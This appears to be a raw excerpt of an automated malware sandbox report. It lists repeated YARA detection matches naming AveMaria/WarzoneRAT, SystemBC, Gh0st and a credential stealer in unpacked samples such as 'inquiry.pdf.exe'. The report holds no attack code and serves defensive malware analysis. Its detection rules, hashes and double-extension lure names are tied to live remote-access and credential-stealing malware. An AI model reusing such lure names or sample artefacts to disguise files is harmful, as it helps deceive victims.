Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3c8c5ea.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
